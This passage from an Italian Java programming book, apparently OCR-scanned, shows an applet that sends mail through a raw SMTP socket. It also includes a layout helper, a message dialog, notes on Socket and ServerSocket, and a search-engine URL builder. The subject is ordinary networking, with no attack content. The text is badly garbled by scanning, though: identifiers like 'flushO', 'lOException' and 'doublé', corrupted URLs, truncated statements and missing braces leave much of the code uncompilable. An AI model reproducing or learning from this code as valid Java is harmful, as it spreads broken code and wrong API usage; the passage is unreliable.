if (!rstr.startsWith("250")) throw new ProtocolException(rstr); 

sstr = "MAIL FROM: " + from_address ; 

send.print(sstr); 

send.print(EOL); 

send.flushO; 

rstr = reply.readLine(); 

if (!rstr.startsWith("250")) throw new ProtocolException(rstr); 

sstr = "RCPT TO: " + to_address; 

send.print(sstr); 

send.print(EOL); 

send.flushO; 

rstr = reply.readLineO; 

if (!rstr.startsWith("250")) throw new ProtocolException(rstr); 

send.print("DATA"); 

send.print(EOL); 

send.flushO; 

rstr = reply.readLineO; 

if (!rstr.startsWith("354")) throw new ProtocolException(rstr); 

send.print("From: " + from_address); 

send.print(EOL); 

send.print("To: " + to_address); 

send.print(EOL); 

send.print("Subject: " + subject); 

send.print(EOL); 

Date today_date = new Date(); 

send.print("Date: " + msgDateFormat(today_date)); 

send.print(EOL); 

send.flushO; 

send.print("Comment: Unauthenticated sender"); 
send.print(EOL); 

send.print("X-Mailer: JNet javaCenterSmtp"); 
send.print(EOL); 

send.print(EOL); 

send.print(message); 

send.print(EOL); 

send.print("."); 

send.print(EOL); 

send.flushO; 

rstr = reply.readLineO; 

if (!rstr.startsWith("250")) throw new ProtocolException(rstr); 

} 

// 

// Chiude il socket utilizzato 

// 

public void close() { 
try{ 

send.print("QUIT"); 
send.print(EOL); 
send.flushO; 
sock.closeO; 

} 

catch (lOException ioe) {} 



protected void finalizeO throws Throwable { 
this.closeO; 
super.finalizeO 
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} 

// 

// Formatta la data del messaggio in modo corretto 

// 

private String msgDateFormat( Date senddate) { 
String formatted = "hold"; 

String Day[] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"}; 

String MonthQ = {"Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dee"}; 

formatted = Day[senddate.getDay()] + ", "; 
formatted = formatted + String.valueOf(senddate.getDateO) + " "; 
formatted = formatted + Month[senddate.getMonth()] + " "; 
if (senddate.getYear() > 99) 

formatted = formatted + String.valueOf(senddate.getYear() + 1900) + " "; 

else 

formatted = formatted + String.valueOf(senddate.getYear()) + " "; 
if (senddate.getHours() < 10) formatted = formatted + "0"; 
formatted = formatted + String.valueOf(senddate.getHours()) + 
if (senddate. getMinutes() < 10) formatted = formatted + "0"; 
formatted = formatted + String. valueOf(senddate.getMinutes()) + 
if (senddate.getSeconds() < 10) formatted = formatted + "0"; 
formatted = formatted + String.valueOf(senddate.getSecondsO) + " "; 
if (senddate.getTimezoneOffset() < 0) 

formatted = formatted + "+"; 

else 

formatted = formatted + 
if (Math.abs(senddate.getTimezoneOffset())/60 < 10) formatted = formatted + "0"; 
formatted = formatted + String.valueOf(Math.abs(senddate.getTimezoneOffeet())/60); 
if (Math.abs(senddate.getTimezoneOffset())%60 < 10) formatted = formatted + "0"; 
formatted = formatted + String.valueOf(Math.abs(senddate.getTimezoneOffset())%60); 

return formatted; 

} 

} 

Questa e' la classe che si interesserà' fisicamente del messaggio. 

La classe che segue invece e' quella che gestisce la maschera dei dati e che 

richiama la classe appena vista. 

In questa parte ritroviamo le funzioni che settano il gestore di layout e che 
posizionano gli oggetti come i pulsanti e i campi di testo in cui inserire i dati a video. 



// 

// Gestisce la maschera dei dati 

// 

class javaCenterSendMail extends Panel implements ActionListener 
{ 

private javaCenterMSGBox mbox; 
private Applet applet; 
private String m mailhost; 
private String m_mailto; 
private TextField mailAddress; 
private TextArea messageText; 
private Button invia; 

public javaCenterSendMail(Applet applet, String m mailhost, String m mailto) 
{ 

super(); 

this.applet = applet; 

this.m mailhost = m mailhost; 
this.m mailto = m_mailto; 



setBackground(Color.lightGray); 

GridBagLayout gridbag = new GridBagLayoutQ; 
setLayout(gridbag); 

GridBagConstraints constraints = new GridBagConstraints(); 
javaCenterConstrainer constrainer = new javaCenterConstrainer(this, constraints); 
constrainer.getDefaultConstraints().insets = new lnsets(5, 5, 5, 5); 

Label strTmp = new Label("lnvio messaggi all' host : "); 

constrainer.constrain(strTmp, 0, 0, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 
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strTmp.setFont(new Fontf'Dialog", Font.BOLD, 14)); 
strTmp.setForeground(Color.red); 

strTmp = new Label("Vostro Email: "); 

constrainer.constrain(strTmp, 0, 2, 20, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

mailAddress = new TextField("vs@email", 60); 

constrainer.constrain(mailAddress, 20, 2, 60, 1, 1, 0, GridBagConstraints.BOTH, 
GridBagConstraints.WEST); 

add(mailAddress); 

strTmp = new Label("Testo messaggio: "); 

constrainer.constrain(strTmp, 0, 4, 20, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

messageText = new TextArea("", 10, 60); 

constrainer.constrain(messageText, 0, 6, 80, 10, 1, 0, GridBagConstraints.BOTH, 
GridBagConstraints.WEST); 

add(messageText) ; 

messageText.setFont(new Font("Dialog", Font.BOLD, 12)); 
messageText.setBackground(new Color(0,60,0)); 
messageText.setForeground(new Color(0,255,0)); 

invia = new Button("lnvia messaggio"); 

constrainer.constrain(invia, 0, 18, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints. CENTER); 
add(invia); 

invia. addActionListener(this); 

} 

public void actionPerformed(ActionEvent e) 

< 

String selected = e.getActionCommand(); 

if(selected.equals("lnvia messaggio")) { 

String Email = mailAddress.getText(); 

if(Email.length()<1){ 

mbox = new javaCenterMSGBox(null, "Attenzione", "Inserire la Vs. 

email"); 

mailAddress.requestFocusO; 
return; 

} 

String Testo = messageText.getText(); 
if(Testo.length()< 1){ 

mbox= new javaCenterMSGBox(null, "Attenzione", "Inserire il testo"); 

messageText.requestFocus(); 

return; 

} 

// 

// Controlla che i dati siano stati inseriti e chiama il costruttore 
// della classe che si interesserà' dell' invio della mail, 

// 

try{ 

javaCenterSmtp connect = new javaCenterSmtp(m mailhost); 
connect.sendmsg(Email,m mailto, "Messaggio", Testo); 

} 

catch(SmtpProtocolException x5) 
{ 

mbox = new javaCenterMSGBox(null, "ERRORE", "Smtp protocol 

exception - "+ x5.toString()); 

System.out.println(x5.getMessage()); 

} 

catch (UnknownHostException x1) { 

mbox= new javaCenterMSGBox(null, "ERRORE", "Failed to find host- " 

+ m mailhost + "- "+ x1.toString()); 

System.out.println(x1.getMessage()); 

} 

catch (ProtocolException x2) { 

mbox= new javaCenterMSGBox(null, "ERRORE", "Some sort of 

protocol exception -" + x2.toString()); 

System.out.println(x2.getMessage()); 

} 

catch (lOException x3) { 

mbox= new javaCenterMSGBox(null, "ERRORE", "Error reading/writing 

to socket on " + m mailhost + "- "+ x3.toString()); 

System.out.println(x3.getMessage()); 

} 

} 

} 
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Per la gestione della formattazione dei campi e' stata utilizzata una classe che 
semplifica I' utilizzo del gestore di layout GridBagLayout ed una per la visualizzazione 
dei messaggi temporanei. 

Il posizionamento dei vari pulsanti, campi di testo ecc. avverrà' nel seguente modo. 



Button cerca = new Button ("Cerca"); 

constrainer.constrain(cerca, 50, 4, 10, 1, 1, 0, GridBagConstraints.BOTH, 

GridBagConstraints.WEST); 

add(cerca); 

Prima di vedere le classi legate all' uso della rete utilizzate nei due moduli precedenti 
riporto queste due classi. 



// 

// Dialog creata per visualizzare messaggi temporanei 

// quali ad esempio segnalazioni di errore. 

// Viene creata a partire dalla classe Dialog con il solo 

// pulsante OK, che permette di uscirne dopo aver letto il testo. 



class javaCenterMSGBox extends Dialog implements ActionListener, WindowListener 
{ 

public javaCenterMSGBox(Frame parent, String title, String message) 

< 

super(parent, title, true); 

setLayout(new FlowLayout(FlowLayout.CENTER)); 

Label testMsg = new Label(message); 
add(testMsg); 

Button ok = new Buttonf'Ok"); 
add(ok); 

ok.addActionListener(this); 
addWindowListener(this); 

setBackground(Color.lightGray); 

setSize(400, 100); 
setVisible(true); 

} 

public void actionPerformed(ActionEvent e) 

{ 

String selected = e.getActionCommand(); 

if(selected.equals("Ok")) 
dispose(); 

} 

public void windowActivated(WindowEvent event) {} 
public void windowClosed(WindowEvent event) {} 
public void windowClosing(WindowEvent event) { dispose(); } 
public void windowDeactivated(WindowEvent event) {} 
public void windowDeiconified(WindowEvent event) {} 
public void windowlconified(WindowEvent event) {} 
public void windowOpened(WindowEvent event) {} 

} 

// 

// Questa classe costituisce una semplificazione per I uso 
// del gestore di layout GridBagLayout che pur essendo il 
// più' flessibile e potente e' anche il più' complesso. 

// 

class javaCenterConstrainer extends Object 
{ 

public GridBagConstraints getDefauItConstraintsQ 
{ 
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return defauItConstraints; 

} 

public Container getDefaultContainer() 
{ 

return defauitContainer; 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize) 
{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize); 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize, doublé xWeight, 
doublé yWeight) 

{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight); 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize, doublé xWeight, 
doublé yWeight, int fili) 

{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili); 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili, int anchor) 

{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, 

anchor); 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili, int anchor, int xPadding, int yPadding) 

{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, 
anchor, xPadding, yPadding); 

} 

public void constrain(Component component, int xPosition, int yPosition, int xSize, int ySize, doublé xWeight, 
doublé yWeight, int fili, int anchor, int xPadding, int yPadding, hsets insets) 
{ 

constrain(defaultContainer, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, 
anchor, xPadding, yPadding, insets); 
} 

public void constrain(Container container, Component component, int xPosition, intyPosition, int xSize, int 

ySize) 

{ 

constrain(container, component, xPosition, yPosition, xSize, ySize, defauitConstraints.weightx, 
defauItConstraints.weighty); 

} 

public void constrain(Container container, Component component, int xPositbn, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight) 

{ 

constrain(container, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, 
defauitConstraints.fill); 

} 

public void constrain(Container container, Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili) 

{ 

constrain(container, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, 
defauItConstraints.anchor); 

} 

public void constrain(Container container, Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili, int anchor) 
{ 

constrain(container, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, anchor, 
defauItConstraints.ipadx, defauitConstraints.ipady); 

} 

public void constrain(Container container, Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili, ht anchor, int xPadding, int yPadding) 

{ 

constrain(container, component, xPosition, yPosition, xSize, ySize, xWeight, yWeight, fili, anchor, 
xPadding, yPadding, defauItConstraints. insets); 
} 

public void constrain(Container container, Component component, int xPosition, int yPosition, int xSize, int ySize, 
doublé xWeight, doublé yWeight, int fili, int anchor, int xPadding, int yPadding, Insets insets) 
{ 

GridBagConstraints constraints = new GridBagConstraints(); 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



constraints.gridx = xPosition; 
constraints.gridy = yPosition; 
constraints.gridwidth = xSize; 
constraints.gridheight = ySize; 
constraints.fill = fili; 
constraints.lpadx = xPaddlng; 
constraints.lpady = yPaddlng; 
constraints.lnsets = Insets; 
constraints.anchor = anchor; 
constraints.welghtx = xWelght; 
constraints.weighty = yWeight; 

((GrldBagLayout) container.getLayout()).setConstraints(comporent, constraints); 

public javaCenterConstrainer() 

this((Container) nuli, new GridBagConstraintsO); 

public javaCenterConstrainer(GridBagConstraints constraints) 
this((Container) nuli, constraints); 

public javaCenterConstrainer(Container container) 

this(container, new GridBagConstraintsO); 

public javaCenterConstrainer(Container container, GridBagConstraints constraints) 
super(); 

defauitContainer = container; 
defauItConstraints = constraints; 

public void setDefaultConstraints(GridBagConstraints constraints) 
defauItConstraints = constraints; 

public void setDefaultContainer(Contaher container) 
defauitContainer = container; 

private GridBagConstraints defauItConstraints; 
private Container defauitContainer; 

} 



• LA CLASSE Socket 

Nella parte che si interessava dell' invio del messaggio c'era la seguente parte di 
codice : 

sock = new Socket( hostid, port ); 

reply = new DatalnputStream( sock.getlnputStream() ); 

send = new PrintStream( sock.getOutputStream() ); 

Un socket può' essere considerato come il punto di connessione a due vie esistente 
tra due programmi che girano in rete. 

In altre parole un socket e' la rappresentazione in Java di una connessione TCP. 

In pratica quando si vuole eseguire un collegamento ad un sistema in rete si conosce 

I' indirizzo di questo. 

Mediante il numero di porta e' possibile richiedere la connessione ad un software 
specifico che gira su questa macchina. 

Nel nostro caso abbiamo utilizzato il socket aperto utilizzando il nome del server mail 
e la porta 25 (quella del demone mail) per aprire uno stream di output sul quale 
scrivere i dati relativi al messaggio da inviare. 

Come e' possibile vedere anche dalle due righe di codice appena riportate la fase di 
scrittura si suddivide in due fasi : 
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1 
2 



apertura del socket sul host + numero di porta 
apertura in scrittura di uno stream 



Come avrete visto gli stream aperti sono di fatto due. 

Uno per scriverci i dati del messaggio e I' altro per leggere le repliche del demone 
mail. 

E' possibile utilizzare la classe socket per la creazione di software client/server. 
Supponiamo che sul server giri un programma relativo ad un gioco che apre un 
socket su una fatidica porta 2222. 

Qualsiasi client potrà' comunicare con tele software aprendo anch'esso un socket 
utilizzando il nome dell' host e il numero di porta 2222. 
Il software sul sever www.aquilotto.com avrà' la forma : 

Socket sock = new Socket(2222); 
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Sul client invece si avrà' : 

Socket sock = new Socket("www.aquilotto.com", 2222); 

Chiaramente questo e' il concetto di base in quanto nel caso di una gestione reale 
multiutente si dovrebbe eseguire un implementazione tramite thread. 

• LA CLASSE ServerSocket 

Questa classe rappresenta un connessione TCP in attesa di ricezione. 

Non appena viene ricevuta una richiesta di connessione la classe ServerSocket 

restituisce un oggetto Socket. 

Ad esempio : 

ServerSocket servSock = new ServerSocket(5555); 
definisce un server che monitorizza la porta 5555. 
Socket incoming = servSock.accept(); 

chiede di attendere fino a che un client non si connetterà' alla porta 5555. 

A quel punto il metodo accept ritornerà' restituendo un socket che potrà' essere 
utilizzato per la comunicazione con il client. 

Vediamo ora un' altra parte del codice che risulterà' interessante per il fatto che 
mostra I' utilizzo di risorse URL relative ai maggiori motori di ricerca. 
Normalmente per fare ricerche e' necessario connettersi ad un determinato motore di 
ricerca. 
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La seguente parte di codice mostra una maschera in cui viene richiesto di inserire i 
dati da ricercare e il motore su cui eseguire la ricerca. 

Una delle migliorie apportate nella versione 1.1 del JDK e' che la classe 
ServerSocket e la classeSocket non sono più' definite come final percui possono 
essere estese. 

Il seguente esempio mostra una possibilità' fornita con la versione 1 .1 . 



class SSLServerSocket extends ServerSocket { 

public Socket accept () throws lOException 
{ 

SSLSocket s = new SSLSocket (certChain, privateKey); 
// create an unconnected client SSLSocket, that we'll 
// return tram accept 

implAccept (s); 
s.handshake (); 
return s; 

} 

} '" 

class SSLSocket extends java. net. Socket { 

public SSLSocket(CertChain c, PrivateKey k) { 
super() ; 

} 

} ' 



class javaCenterSearch extends Panel Implements ActionLlstener 

{ 

private Applet applet; 
private TextField tf ; 
private Choice c; 
private URL tmpURL; 

public javaCenterSearch(Applet applet) 

{ 

super(); 

this.applet = applet; 

GridBagConstraints constraints = new GridBagConstraints(); 

javaCenterConstrainer constrainer = new javaCenterConstrainer(this, constraints); 
constrainer.getDefaultConstraints().insets = new lnsets(5, 5, 5, 5); 

GridBagLayout gridbag = new GridBagLayoutQ; 
setLayout(gridbag); 

Label strToSearch = new Label("Ricerca su motore :"); 

constrainer.constrain(strToSearch, 0, 2, 25, 1, 1, 0, GridBagConstraints.BOTH, 
GridBagConstraints.WEST); 

add(strToSearch); 

c = new Choice(); 

constrainer.constrain(c, 25, 2, 25, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(c); 

c.addltem("1Blink"); 
c.addltem("AICanSeek"); 
c.addltemfAliWeb"); 
c.addltem(" AltaVista") ; 
c.addltem("AskJeeves"); 
c.addltem("Cade Brazil"); 
c.addltem("Canada") ; 
c.addltem("Cari Malaysia"); 
c.addltem("Claymont"); 
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c.addltem("Dewa"); 

c.addltem("Excite"); 

c.addltem("Euroseek"); 

c.addltem("Goo Japan"); 

c.addltem("Goto"); 

c.addltem("Highway61"); 

c.addltem("Hotbot"); 

c.addltem("llse"); 

c.addltem("lnfoseek"); 

c.addltem("ldentify"); 

c.addltem("KHOJ"); 

c.addltemf'Liszt"); 

c.addltem("Lycos"); 

c.addltem("Mamma"); 

c.addltem("Magellan"); 

c.addltem("Metacrawler"); 

c.addltem("NZSearch"); 

c.addltem("OneKey") ; 

c.addltem("Oomph! Korea"); 

c.addltem("Senrigan Japan"); 

c.addltem("Savvy Search"); 

c.addltem("Scrubtheweb"); 

c.addltem("Search"); 

c.addltemfSearchUK"); 

c.addltem("Snap"); 

c.addltem("Starting Point"); 

c.addltem("UkDirectory"); 

c.addltem("WebCrawler") ; 

c.addltemfWebSitez") ; 

c.addltem("Whatuseek"); 

c.addltem(" Yahoo") ; 

c.addltem("100Hot"); 

tf = new TextFieldf", 50); 

constrainer.constrain(tf, 0, 4, 50, 1,1,0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(tf); 

Button cerca = new Buttonf'Cerca"); 

constrainer.constrain(cerca, 50, 4, 10, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cerca); 

Label cvs = new Label("lnserire gli argomenti da cercare separati da spazi o da '+'. Gli spazi vengono 

sostituiti "); 

constrainer.constrain(cvs, 0, 6, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cvs = new Label("automaticamente dai '+' i quali servono di congiunzione come clausole AND per 

ricerche con"); 

constrainer.constrain(cvs, 0, 7, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cvs = new Label(" più' argomenti. Ad esempio se si desidera cercare le pagine che hanno le parole 

GIOCHI, "); 

constrainer.constrain(cvs, 0, 8, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cvs = new Label("DOWNLOAD e FREEWARE si potrà' scrivere : +GIOCHI+DOWNLOAD+FREEWARE"); 
constrainer.constrain(cvs, 0, 9, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cvs = new Labelf'Verranno reperite tutte le pagine in cui compaiono TUTTE TRE le parole."); 
constrainer.constrain(cvs, 0, 10, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cvs = new Labelf'Potrete anche inserire gli argomenti nel seguente modo : GIOCHI DOWNLOAD 

FREEWARE"); 

constrainer.constrain(cvs, 0, 11, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstrairts.WEST); 
add(cvs); 

cvs = new Labelf'll numero massimo di argomenti dipende dal limite stabilito dal motore di ricerca 

selezionato."); 

constrainer.constrain(cvs, 0, 12, 80, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(cvs); 

cerca.addActionListener(this); 
setBackground(Color.lightGray); 



public void actionPerformed(ActionEvent e) 
{ 

String choiceString; 

String selected = e.getActionCommand(); 

if(selected.equals("Cerca")) { 
String s = ""; 
String s1 = tf.getText(); 
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String s2 = ""; 

s2 = s1.replace(' ', '+'); 

H.setText(s2); 

s = c.getSelectedltemO; 

if(s == "Cade Brazil") 

if(tf.getText().length() > 0) 

s1 = "http://busca.cade.com.br/scripts/engine.exe7p1s" +H.getText() + 

"&p2=1&p3=1"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.cade.com.br/"; 

if(s == "Euroseek") 

if(tf.getText().length() > 0) 

s1 = "http://www.euroseek.net/query?iflang=uk&query=" + tf.getText() + 

"&domain=world&lang=world"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.euroseek.net/page7iflsuk"; 

if(s == "Cari Malaysia") 

if(tf.getText().length() > 0) 

s1 = "http://206.184.233.23/cariurl.cgi?" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.cari.com.my/"; 

if(s == "Oomph! Korea") 

if(tf.getText().length() > 0) 
s1 = "http://www.oomph.net/~dasen21/dasencgi/brief.cgi?v_db=1&v_userid=158&v_query=" + 
tf.getText() + "&v_hangul=1&v_expert=Search"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.oomph.net/"; 

if(s == "Goo Japan") 

if(tf.getText().length() > 0) 

s1 = "http://www.goo.ne.jp/default.asp7MT3" + tf.getText() + 

"&SM=MC&WTS=ntt&DE=2&DC=10&_v=2"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.goo.ne.jp/"; 

if(s =="1Blink") 

if(tf.getText().length() > 0) 

s1 = "http://www.1blink.com/search.cgi?q=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.1blink.com/"; 

if(s == "Savvy Search") 

if(tf.getText().length() > 0) 

s1 = "http://williams.cs.colostate.edu:1969/nph-search?KW=" + 

tf.getText() + 

"&classic=on&t1=x&t2=x&t3=x&t4=x&t5=x&t6=x&t7=x&t8=x&t9=x&t10=x&Boolean=AND&Hits=10&Mode=MakePlan&df=:nor 
mal&AutoStep=on"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.cs.colostate.edu/~dreiling/smartform.html"; 

if(s == "Canada") 

if(tf.getText().length() > 0) 
s1 = 

"http://results.canada.com/search/search.asp?RG=world&SM=must%3Awords&QRY=" + tf.getText() + 
"&PS=10&DT=1&GO.x=30&GO.y=8"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.canada.com/"; 

if(s == "KHOJ") 

if(tf.getText().length() > 0) 

s1 = "http://www.khoj. com/bin/khoj_search?searchkey=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.khoj.com/"; 

if(s == "AMWeb") 

if(tf.getText().length() > 0) 

s1 = "http://www.aliweb.com/form2.pl7querys" + tf.getText() + 
"&showdescription=on&titlefield=on&descriptionfield=on&keywordfield=on&urlfield=on&hits=20&domain=&searchtype=Wh 
ole+Word&types=Any"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.aliweb.com/"; 

if(s == "Liszt") 

if(tf.getText().length() > 0) 

s1 = "http://www.liszt.com/lists.cgi7words" + tf.getText() + 



"&junk=s&an=all" 



else 

if(tf.getText().length() < 1) 

s1 = "http://www.liszt.com/"; 

if(s == "Byte") 

if(tf.getText().length() > 0) 

s1 = "http://www.byte.com/search7queryText3" + tf.getText(); 

else 
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if(tf.getText().length()< 1) 

s1 = "http://www.byte.com/"; 

if(s == "AlCanSeek") 

if(tf.getText().length() > 0) 

s1 = "http://www.alcanseek.com/acgibin/find.cgi?" + tf.getTe)4() + 

"=01"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.alcanseek.com/"; 

if(s == "Claymont") 

if(tf.getText().length() > 0) 

s1 = "http://www.claymont.com/cgi- 
bin/htsearch?config=htdig&restrict=&exclude=&method=and&format3builtin-long&words=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.claymont.com/"; 

if(s=="Cyber411") 

if(tf.getText().length() > 0) 

s1 = "http://www.cyber411.com/cgi-bin/nph- 
search.cgi?AV=on&DN=on&EX=on&GX=on&G2=on&HB=on&LS=on&LY=on&MG=on&NL=on&PS=on&SC=on&TS=on&WC=o 
n&WU=on&YH=on&query=" + tf.getText() + "&timeout=30&connects=5"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.cyber411.com/"; 

if(s == "OneKey") 

if(tf.getText().length() > 0) 

s1 = "http://www.onekey.com/search/search.cgi?query=" + tf.getText() 



+ "&logic=or&max_hits=10"; 



tf.getText(); 



else 

if(tf.getText().length()< 1) 

s1 = "http://www.onekey.com/"; 

if(s == "NZSearch") 

if(tf.getText().length() > 0) 

s1 = "http://www.nzsearch.com/cgi-localbin/nzsearch.cgi7search3" + 



else 

if(tf.getText().length()< 1) 

s1 = "http://www.nzsearch.com/"; 

if(s == "UkDirectory") 

if(tf.getText().length() > 0) 
s1 = 

"http://www.ukdirectory.com/datafiles/alphasearch.cgi7searchboxs" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.ukdirectory.com/"; 

if(s == "SearchUK") 

if(tf.getText().length() > 0) 

s1 = "http://www.searchuk.com/cgi-bin/search7searchs" + tf.getText() + 



"&z=0&y=1 &w=0&g=0&r=&ru=&n=3"; 

if(s =="100Hot") 

tf.getTextQ; 



else 

if(tf.getText().length()< 1) 

s1 = "http://www.searchuk.com/"; 

if(tf.getText().length() > 0) 

s1 = "http://www.100hot.com/cgi-bin/main_search.cgi7querys" + 



else 

if(tf.getText().length() < 1) 

s1 = "http://www.100hot.com/"; 

if(s == "Starting Point") 

if(tf.getText().length() > 0) 

s1 = "http://www.stpt.com/cgi-bin/pwrsrch/altavista.cgi7query3" + 

tf.getText() + "&search=web"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.stpt.com/"; 

if(s == "AltaVista") 

if(tf.getText().length() > 0) 

s1 = "http://www.altavista.digital.com/cgi- 

bin/query?pg=q&what=web&fmt=.&q=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.altavista.digital.com/"; 

if(s == "WebSitez") 

if(tf.getText().length() > 0) 

s1 = "http://search.websitez.com/search.cgi?key=" + tf.getText() + 

"&search=1 &type=1 &submit1 =Find"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.WebSitez.com/"; 

if(s == "Dewa") 

if(tf.getText().length() > 0) 

s1 = "http://www.dewa.com/cgi-bin/search.cgi?k=" + tf.getText() + 

"&b=o"; 

else 

if(tf.getText().length()<1) 
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s1 = "http://www.Dewa.com/"; 

if(s == "AskJeeves") 

if(tf.getText().length() > 0) 

s1 = "http://www.askjeeves.com/AskJeeves.asp7asks" + tf.getText() + 

"&qSource=0&site_name=Jeeves&metasearch=yes"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.AskJeeves.com/"; 

if(s == "Goto") 

if(tf.getText().length() > 0) 
s1 = 

"http://www.goto.com/d/search/;$sessionid$H4EWPLIAAAYTFQFIEENQPUQ?Keywords=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = 

"http://www.Goto.com/"; 

if(s == "Scrubtheweb") 

if(tf.getText().length() > 0) 

s1 = "http://www.scrubtheweb.com/cgi- 
bin/search.cgi?action=Search&cat=AII&searchtype=all&keyword=" + H.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Scrubtheweb.com/"; 

if(s == "Identify") 

if(tf.getText().length() > 0) 

s1 = "http://www.identify.com/identify.cgi7ws" + tf.getText() + "&st=p"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.ldentify.com/"; 

if(s == "Metacrawler") 

if(tf.getText().length() > 0) 

s1 = "http://www.metacrawler.com/crawler7generals" + tf.getText() + 
"&method=0&target=&region=0&rpp=20&timeout=5&hpe=10"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Metacrawler.com/"; 

if(s == "Magellan") 

if(tf.getText().length() > 0) 

s1 = "http://www.mckinley.com/search.gw7searchs" + tf.getText() + 

"&c=web&look=magellan"; 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.mckinley.com/"; 

if(s == "Whatuseek") 

if(tf.getText().length() > 0) 

s1 = "http://seek.whatuseek.com/cgi- 
bin/seek.aipha.go?db=db&defcmd=find&disp=all&grsz=0&proximity=rank&suffixproc=off&thesaurus=0&arg=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Whatuseek.com/"; 

if(s == "Highway61") 

if(tf.getText().length() > 0) 

s1 = "http://207.226.255.65/nph-seek.cgi?string=" + tf.getText() + 
"&bool=and&new_wins=on&speed=reasonable&hits=lots&yahoo_cats=on&armadillo=5&s=wwwyx&dom=2&c=73701"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Highway61.com/"; 

if(s == "Mamma") 

if(tf.getText().length() > 0) 

s1 = "http://www.mamma.com/cgi- 
bin/parsearch2?lang=1&timeout=6&qtype=0&query=" + tf.getText() + "&summaries=on"; 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Mamma.com/"; 

if(s == "lise") 

if(tf.getText().length() > 0) 
s1 = 

"http ://www. Use. com/?COMMAND=search_for&LANGUAGE=NL&ANDOR=OR&EXTRACT=short&SEARCH_FOR=" + 
tf.getText(); 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.llse.com/"; 

if(s == "Yahoo") 

if(tf.getText().length() > 0) 

s1 = "http://search.yahoo.com/search7ps" + tf.getText(); 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.Yahoo.com/"; 

if(s == "Infoseek") 

if(tf.getText().length() > 0) 

s1 = "http://www.infoseek.com/Titles7qts" + tf.getText(); 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.lnfoseek.com/"; 

if(s == "Hotbot") 

if(tf.getText().length() > 0) 
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s1 = "http://www.hotbot.com/default.asp7MTs" + tf.getText(); 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.lnfoseek.com/"; 

if(s == "Lycos") 

if(tf.getText().length() > 0) 

s1 = "http://www.nl.lycos.de/cgi- 
